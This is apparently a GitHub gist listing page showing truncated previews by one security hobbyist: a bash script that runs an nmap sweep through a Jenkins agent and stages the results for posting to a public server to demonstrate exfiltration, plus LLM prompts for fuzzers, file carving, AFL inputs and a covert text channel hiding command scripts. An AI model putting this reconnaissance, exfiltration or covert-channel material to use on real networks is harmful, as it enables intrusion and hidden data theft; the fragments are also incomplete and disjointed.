Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# Mod by: MR.K7C8NG
# team: life of programmer
import os
import sys
import time
import random
#!/bin/bash
# Testing a thing here.
# Essentially, using jenkin's agent connection to run this and post data to a public server, to showcase exfil potential.
echo "running nmap"
sudo nmap -sn 192.168.1.1/24 -oN /tmp/arp-scan 2>/dev/null
log=`cat /tmp/arp-scan| grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'|sed s/'$'/','/g|sort -u|tr -d '\n'|sed s/',$'//g`
data='{"text":"'$log'"}'
echo "check log data"
echo $data
echo "send log data"
@ferasdour
ferasdour / gist:f291b55c2e10872a0e0d4c5b1401bbd4
Created May 14, 2025 17:29
ai ansible for fun and giggles
---
- hosts: all # This playbook was entirely created by hf.co/reedmayhew/claude-3.7-sonnet-reasoning-gemma3-12B with multiple itterations of telling it to check for problems.
gather_facts: false
tasks:
- name: Install required tools
become: true
package:
name:
- scp
- ffuf
>>> write a python script that takes the source code from a git repo, scans the repo for code flaws and optimization ri
... sks, then attempts to identify potential security vulnerabilities, using specified ai model from huggingface in a s
... et series of testing loops (3 rounds) with each time completing asking to recheck for any additional risks, flaws, a
... nd vulnerabilities. likewise, when you write this script, also check for the same within this script you write that
... could make these scripts by doing 3 itterations of optimization checks.
```python
import os
import subprocess
import shutil
>>> let me try this differently. how could I, using golang, write an (huggingface imported, not openapi/web based) llm assisted tool file carving tool, that uses the llm to determine file completeness while pe
... rforming filecarving (on hard drives, disk images, or ram images; so this needs to be able to read and understand whatever is in the file as raw bytes, but then the llm needs to be able to consider if this
... is a complete file), effectively by adding another 512 bytes at a time until the llm believes this is the end of the file and adding the next doesn't match the same file. can you then do 6 cycles (perform
... , take the given output, then recheck each time) at checking for code flaws, optimization, and potential security faults in the code provided all while keeping in mind the requirements of this task. If it,
... 's the most optimal, then provide me that code. Please don't give me example code or explainations, give me working code. lets say the model to use would be "hf.co/reedmayhew/claud
I asked copilot:
can you generate a plot point graph showcasing the difference in these two ideas? The first, is brute force using keyspace brute forcing and how encrypted rngs bypass this. The graph for that may be something like attempts required versus time to succeed. the second graph idea, is using a novel brute force method that attempts to exploit collision entropy, but instead of using the same generator scheme (like mathmatical collisions) its instead using a comparable rng generation equation, but with a blacklisting method where knows all the generations made by the other one.
```
Graph 1: Traditional Brute Force vs Encrypted RNGs
Blue dots: Traditional brute force gradually increases in success probability with more attempts.
Orange dots: Encrypted RNGs maintain a flat, very low success probability due to high entropy.
Graph 2: Collision Entropy with Blacklisting
Green dots: This method shows a faster rise in success probability by avoiding previously generated values, simulating a smarter brute
>>> given this script, provide me with 100 initial command possibilities for afl input for the binary generat
... ed from this: package main
... import (
... "fmt"
... "os"
... "os/exec"
... "time"
... "github.com/projectdiscovery/interactsh/pkg/client"
... "github.com/projectdiscovery/interactsh/pkg/server"
... "regexp"
# this was created with copilot, I was trying to test its capabilities to create and validate it's own results.
# it seems to out-perform my local ollama running claude3.7
# need to test and update and do some debugging still I'm sure, but the idea was super dumb but seemingly complex:
# "I'm trying to write a wrapper for angr with z3, using python3's transformers and pytorch packages. I want the wrapper to leverage an llm to attempt to identify constraints for every externally controlled data input, then fuzz each of those inputs. Accommodating both user-provided cli arguments, and network-provided data fields, as well as functions such as reading data from the system. The ultimate goal is to leverage this as a fuzzing tool that doesn't care about which language its in, but still provides meaningful potential options for the fuzzing parameters. Which any of those parameters, i want the llm to provide the series of possibilities for (fuzz data). "
import angr
import claripy
import torch
from transformers impo
Exception ignored in: <function ObjectPipe.__del__ at 0x7efe1b59f7e0>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/scapy/automaton.py", line 261, in __del__
self.close()
File "/usr/lib/python3/dist-packages/scapy/automaton.py", line 246, in close
os.close(self.__rd)
AttributeError: 'ObjectPipe' object has no attribute '_ObjectPipe__rd'
I'm looking into feasibility to create a form of secret communication tunnel. I want to leverage llms (i don't know if I need to make a new model for this, or just customized prompts) to create a story, ad, or otherwise text document that has hidden command scripts inside the letters either through hidden linguistic abnormalities or slight character substitutions that appear to fit the original character, that ideally only another instance of the same llm could identify. I do have some background in studying linguistics, code switching, as well as identifying statistically anomalous linguistic text so I do know that much is possible. what I don't know is if there is a point to which an llm could pick it up faster and more efficiently than a human. And as always, I'd like to see an example script that could do this.
Copilot said:
Copilot
You're exploring a fascinating and technically rich concept—embedding covert signals or commands within natural language text using LLMs, in a way that only another LLM (or a